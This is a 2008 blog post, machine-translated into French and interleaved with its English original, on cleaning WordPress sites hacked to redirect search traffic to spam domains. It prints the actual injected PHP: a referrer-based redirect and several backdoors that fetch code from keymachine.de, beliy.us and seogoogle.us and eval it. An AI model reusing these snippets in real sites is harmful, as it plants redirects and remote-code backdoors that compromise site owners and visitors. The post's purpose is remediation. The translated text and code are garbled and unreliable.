WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Your-Needs.info, AnyResults.Net, Golden-Info.net and Other Illegal Sites Hack WordPress: Récupérer et Fix Google et les moteurs de recherche ou pas de cookie trafic Ajouter à votre-Needs.info, AnyResults.Net, Golden-Info.net et autres sites illégaux

Hackers are going all out to hack and exploit WordPress blogs hosted all over the web, planting and injecting malicious code into WordPress codes and database in order to redirect visitors and hits from Google and other search engines to spam sites such as your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us and many other spam sites that filled with pay-per-click CPC ads. Les pirates informatiques sont en cours à tous les hack WordPress et d'exploiter tous les blogs hébergés sur le Web, la plantation et l'injection de code malveillant dans WordPress codes et la base de données afin de rediriger les visiteurs et les visites de Google et d'autres moteurs de recherche contre le spam des sites tels que votre needs.info , Anyresults.net, or-info.net, keymachine.de, beliy.us, seogoogle.us et de nombreux autres sites qui spam rempli avec système pay-per-click annonces au CPC. Some hack appears to target bigger crowd by redirecting all without WordPress cookie. Certains hack semble cibler plus grande foule, en recentrant tous, sans témoin WordPress. Without been hacked, these traffic supposedly to arrive at the blog as destination. Sans été piraté, ces circulation disant pour arriver à le blog comme destination.

Symptoms of the Search Engine Redirection Hack Les symptômes du moteur de recherche de redirection hack

Note that not all symptoms may happen altogether. Il est à noter que pas tous les symptômes tout à fait se passer mai. There may be more than one method of hacks existed, which contributed to different finding and possible resolution. Il mai plus d'une méthode de hacks existe, qui a contribué à trouver différentes et éventuellement la solution.

• Any click through from search engines such as Google, Yahoo, AOL, MSN, Windows Live search results, including blog name, will be redirected and forwarded to hacker’s sites such as your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us, with the list sure to grow. Toute cliquer sur des moteurs de recherche tels que Google, Yahoo, AOL, MSN, Windows Live résultats de recherche, y compris le nom de blog, sera redirigé et transmis au pirate de sites tels que votre needs.info, anyresults.net, or-info . net, keymachine.de, beliy.us, seogoogle.us, avec la liste assurez-vous de croître. Viewer arrives at the hacker page with the same search string that he or she used to search in search engine. Viewer arrive à la page de pirates avec la même chaîne de recherche qu'il ou elle permet de rechercher dans moteur de recherche.
• Click on a link to the blog on RSS feed reader such as Google reader can be redirected to hacker site too. Cliquez sur un lien vers le blog sur lecteur de flux RSS tels que Google Reader peut être redirigé vers le site pirate.
• A visitor with no account on the blog, or not login (hence does not has cookie detected by malicious code), will be redirected to spam sites. Un visiteur sans compte sur le blog, ou pas de connexion (et donc ne pas cookie a détecté par le code malveillant), seront redirigés vers les sites de spam.
• Only visits from search engine are been redirected away, and the trick manage to fool around probably a lot of bloggers, webmasters and site owners, or at least delay the detection of the problem. Seulement des visites de moteur de recherche sont été redirigé immédiatement, et de gérer le truc pour tromper probablement autour de beaucoup de blogueurs, webmasters et les propriétaires du site, ou au moins retarder la détection du problème.
• Sudden huge and dramatic drop and lose of massive amount of visitors traffic and page views in web tracker statistics, especially traffic with Google as referrer, even though search engine results ranking is intact. Sudden immense et spectaculaire chute et de perdre de si grande quantité de visiteurs et du trafic de pages vues en web tracker statistiques, en particulier le trafic avec Google comme referrer, même si les résultats du moteur de recherche classement est intact.
• Massic drop of advertising revenue from Google AdSense or other ads network, or affiliate commissions. Massique baisse des recettes publicitaires de Google AdSense ou d'autres annonces réseau ou la société affiliée commissions.
• The following base64 encoded PHP code may appear on the wp-blog-header.php file: Le encodés base64 suivants du code PHP mai figurer sur la wp-blog-header.php fichier:

  <?php \ <? php \
$seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa"); seref $ = array ( "Google", "MSN", "en direct", "AltaVista", "demander", "yahoo", "aol", "CNN", "météo", "alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; } $ ser = 0; foreach ($ seref $ ref) if (strpos (strtolower ($ _SERVER [ 'HTTP_REFERER']),$ ref)! == false) ($ ser = "1? break;)
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit; }?> if ($ ser == "1? & & sizeof ($ _COOKIE) == 0) (header (" Location: http:// ". base64_decode (" YW55cmVzdWx0cy5uZXQ =")."/"); sortie;)?>

• An image, which is in fact a bunch of malicious PHP code, was added to the wp-contents/uploads directory. Une image, qui est en fait un tas de code PHP malicieux, a été ajoutée au répertoire wp-contents/uploads. For example, wp-contents/uploads/2008/06/06/abcdefghijklmn.jpg, or it may be inside your theme folder, ie wp-contents/themes/classic/images/xyz.jpg. Par exemple, wp-contents/uploads/2008/06/06/abcdefghijklmn.jpg, mai ou être dans votre thème dossier, c'est-à-dire wp-contents/themes/classic/images/xyz.jpg. The name of the image may be in the format of xxxxxx_old.jpeg. Le nom de l'image mai être dans le format de xxxxxx_old.jpeg.
• An entry was inserted in MySQL database for WordPress wp_options to activate the image (the malicious PHP code) as a plugin, typically as rss_f541b3abd05e7962fcab37737f40fad8. Un article a été inséré dans une base de données MySQL pour WordPress wp_options pour activer l'image (le code PHP malicieux) comme un plugin, généralement sous forme rss_f541b3abd05e7962fcab37737f40fad8.
• There may be also malicious codes, especially those that interpreted with eval() or base64_decode() command been inserted into other WordPress PHP files. Il est également mai codes malveillants, en particulier ceux qui interprétées avec eval () ou base64_decode () été inséré dans d'autres fichiers PHP de WordPress. Examples are the following codes: Les exemples en sont les codes suivants:

  if(isset($_GET['p'])) { if (isset ($ _GET [ 'p'])) (
$sock = @fsockopen(’km20725.keymachine.de’, 80); $ sock = @ fsockopen ( "km20725.keymachine.de ', 80);
if($sock){ if ($ sock) (
fwrite ($sock, ‘GET http://km20725.keymachine.de/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'].’ HTTP/1.0′.”\r\n”); fputs ($ sock, "GET http://km20725.keymachine.de/server/index.php?host ='.$_ SERVER [ 'SERVER_NAME'].'& p ='.$_ GET [' p ']." HTTP / 1,0 ". \ R \ n");
fwrite ($sock, ‘Host: km20725.keymachine.de’.”\r\n\r\n”); fputs ($ sock, "Host: km20725.keymachine.de". \ r \ n \ r \ n ");
while($content[] = fgets ($sock)); while ($ contenu [] = fgets ($ sock));
$content = implode(”, $content); $ content = implode ( ", $ contenu);
@eval(trim(substr($content, strpos($content, “\r\n\r\n”)))); @ eval (trim (substr ($ contenu, strpos ($ content, "\ r \ n \ r \ n "))));
fclose ($sock);} fclose ($ sock);)
} )

  if(isset($_GET['p'])) { @eval(@file_get_contents(’http://beliy.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'])); if (isset ($ _GET [ 'p'])) (eval @ (@ file_get_contents ( 'http://beliy.us/server/index.php?host ='.$_ SERVER [' SERVER_NAME'].'& p = '. $ _GET [' P']));
} )

  if(isset($_GET['p'])) { @eval(@file_get_contents(’http://seogoogle.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'])); if (isset ($ _GET [ 'p'])) (eval @ (@ file_get_contents ( 'http://seogoogle.us/server/index.php?host ='.$_ SERVER [' SERVER_NAME'].'& p = '. $ _GET [' P']));
} )

  eval(gzinflate(base64_decode( eval (gzinflate (base64_decode (

• WordPress theme that is been activated and used can be injected with hacking code and affected too. WordPress thème qui est activée et peut être utilisé avec l'injection de code et le piratage également touchés. Such code normally exists in header.php or index.php of the theme, and has a line similar to the below Ce code existe normalement dans header.php index.php ou du thème, et a une ligne semblable à la ci-dessous

  if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location: if ($ ser == "1" & & sizeof ($ _COOKIE) == 0) (header ( "Location:

The WordPress search traffic redirect to spam site hack happens probably due to security hole and vulnerability that is not patched when blog owner decides not to upgrade to latest version of WordPress (although some Le trafic de recherche de WordPress rediriger vers le site spam hack se produit probablement en raison de faille de sécurité et de vulnérabilité qui n'est pas corrigé quand propriétaire du blog décide de ne pas mettre à jour à la dernière version de WordPress (bien que certains reports rapports that their blogs been hacked even though it’s already on the latest version of WordPress 2.5.1). que leurs blogs été piraté, même s'il est déjà sur la dernière version de WordPress 2.5.1). Whatever the cause, here’s the fix and solution to resolve and defeat the hack to ensure that you own back the traffic and avoid been penalized by Google by unreasonable redirecting to spam pages. Quelle que soit la cause, voici la correction et la solution pour résoudre la défaite et le hack de veiller à ce que vous possédez le trafic de retour et éviter été pénalisé par Google par déraisonnable redirigé vers une page de spam.

1. Backup the WordPress database. Sauvegarde de la base de données de WordPress.
2. Use phpMyAdmin to browse WordPress MySQL database tables. Utilisez phpMyAdmin pour parcourir WordPress tables de base de données MySQL. Go to wp_options table, and then edit the row named active_plugins . Aller à wp_options tableau, puis modifier le nom active_plugins ligne. The row details all active plugins that has been activated. La ligne de détails tous les plugins actifs qui a été activé. Go through the list (in a line), and look for an a plugin named ended with an image extension, such as .jpg, .jpeg, .gif and etc. For example, abcdefgh_old.jpeg. Allez dans la liste (en ligne), et chercher un plugin nommé une fin avec une image d'extension, tels que. Jpg,. Jpeg,. Gif, etc Par exemple, abcdefgh_old.jpeg. Note down the path to the image file. Notez le chemin vers le fichier image.
3. Using sFTP or SSH (forget about FTP or Telnet for security), then navigate to the path of the file, and delete the file. SFTP ou en utilisant SSH (oublier FTP ou Telnet pour la sécurité), puis naviguer vers le chemin du fichier, et supprimer le fichier.
4. Go to WordPress Administrator Plugins panel, deactivate or activate any plugin to clear off the malicious plugin from the “active_plugins” row. Aller à WordPress Plugins Administrateur panneau de configuration, activer ou désactiver toute plugin pour débarrasser la malveillance du plugin "active_plugins" ligne.
5. Back to phpMyAdmin , at the wp_options table, find a row that contains the following string as option_name : Retour à phpMyAdmin, à la wp_options tableau, trouver une ligne qui contient la chaîne suivante comme option_name:

   rss_f541b3abd05e7962fcab37737f40fad8 rss_f541b3abd05e7962fcab37737f40fad8

   Delete the row away. Supprimer la ligne loin.

   If you don’t know how to perform the database cleanup detailed in steps above, here’sa video tutorial: Si vous ne savez pas comment effectuer le nettoyage de données détaillées dans les étapes ci-dessus, voici un didacticiel vidéo:

6. Go to wp_users table. Aller à wp_users tableau. If there is a nameless user (null value in user_nicename field) created at 00:00:00 on 0000-00-00 , note down the user ID ( ID field, a number). S'il ya un nom d'utilisateur (valeur nulle dans user_nicename domaine) créé à 00:00:00 Le 0000-00-00, noter le numéro d'identifiant (ID domaine, un nombre). Delete the user. Supprimer l'utilisateur.
7. Browse the wp_usermeta table. Parcourir le wp_usermeta tableau. Locate all rows with user_id matches the ID of the deleted illegal user. Repérer toutes les lignes avec user_id matches de l'ID de l'utilisateur supprimé illégale. There are normally three rows been associated to the invader user ID. Il ya normalement trois rangées été associés à l'envahisseur ID utilisateur. Delete all the associated rows. Supprimer toutes les lignes associées.
8. Login to the server to edit the theme files, or browse the theme files’ code in Theme Editor of WordPress Administrator Design panel. Connexion au serveur de modifier le thème des fichiers, ou naviguer sur le thème des fichiers de code dans l'éditeur de thème WordPress Administrateur Design panneau de configuration. Check the header.php and index.php for any suspicious code. Cochez la header.php index.php et en cas de soupçon de code. As mentioned above, look for something similar to the line below: Comme mentionné ci-dessus, chercher quelque chose de similaire à la ligne ci-dessous:

   if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location: if ($ ser == "1" & & sizeof ($ _COOKIE) == 0) (header ( "Location:

   If found, delete and remove the code. S'il est trouvé, supprimer et supprimer le code. Note that the malicious code will be several lines long in total. Notez que le code malveillant aura plusieurs lignes au total.

9. If it’s not already existed, create an empty index.html file in the wp-contents/plugins directory. Si ce n'est pas déjà existé, de créer un fichier index.html vide dans le répertoire wp-contents/plugins. The blank index.html hides the contents of the plugins directory, effectively shield what plug-ins been used from hackers to harden and tighten the WordPress security. La formule d'index.html cache le contenu du répertoire "plugins", effectivement exonérer des plug-ins été utilisé contre les pirates à durcir et renforcer la sécurité de WordPress.
10. Upload and replace each and every WordPress files (not only wp-blog-header.php) on the server with the fresh, clean, and original Transférer et remplacer tous les fichiers de WordPress (et pas seulement wp-blog-header.php) sur le serveur avec les frais, propre et originale latest version from WordPress dernière version de WordPress (of course, except few files such as wp-config.php and themes). (bien sûr, à l'exception de quelques dossiers tels que wp-config.php et thèmes). If you’re upgrading, read the Si vous êtes une mise à jour, lire les guide carefully. soigneusement.
11. Change your password. Changez votre mot de passe.
12. If you have multiple users, change theirs password (or ask them to change the password) too. Si vous avez de multiples utilisateurs, changer leur mot de passe (ou leur demander de changer le mot de passe).

IMPORTANT : This is a machine translated page which is provided "as is" without warranty. IMPORTANT: Il s'agit d'une machine qui traduit la page est fourni «tel quel», sans garantie. Machine translation may be difficult to understand. La traduction automatique mai être difficile à comprendre. Please refer to S’il vous plaît se référer à original English article l'article original en anglais whenever possible. chaque fois que possible.

Share and contribute or get technical support and help at Partagez et contribuer ou obtenir de l'aide technique et l'aide à My Digital Life Forums Ma vie numérique forums .

Related Articles Articles connexes

• Add NoFollow Relationship to WordPress Blogroll to Increase PageRank Ajouter nofollow Relations avec les wordpress blogroll d'augmenter pagerank
• WordPress Plugin: Display Google Analytics and FeedBurner Reports Statistics from Site Admin Wordpress plugin: affichage de Google Analytics et FeedBurner rapports statistiques du site admin
• Technorati Incoming Links Plugin for WordPress Technorati les liens plugin pour WordPress
• A Glance At Google Merchant Search Un coup d'œil sur Google Recherche marchande
• How to Avoid, Bypass or Escape Google Sandbox Comment éviter, de les contourner ou à Escape Google Sandbox
• Ask.com Search Engine Review by CNNMoney Moteur de recherche Ask.com examen par CNNMoney
• Drive More Traffic by Using Images Drive plus de trafic en utilisant des images
• SEO Friendly Rewrite Method to Move Website URL From Subdirectory to Root Parent Folder SEO Friendly réécrire méthode pour aller de site Web de sous-répertoire à la racine du dossier parent
• Integrate and Display Google AdSense for Search and Co-Op Custom Search Engine Results in WordPress Blog Page Template Intégrer et d'afficher le programme Google AdSense pour les recherches et le co-op de recherche personnalisé dans les résultats du moteur de blog WordPress modèle de page
• Which Search Engine is the Best and Most Relevant? Moteur de recherche qui est la meilleure et la plus pertinente?

This entry was posted on Tuesday, June 10th, 2008 at 1:03 am and is filed under Cet article a été publié le mardi, Juin 10, 2008 à 1:03 am et est classé dans Weblogs Weblogs . . You can follow any responses to this entry through the Vous pouvez suivre les réponses à cette entrée par la RSS 2.0 RSS 2,0 feed. nourrir. You can Vous pouvez leave a response laisser un commentaire , or , Ou trackback trackback from your own site. à partir de votre propre site.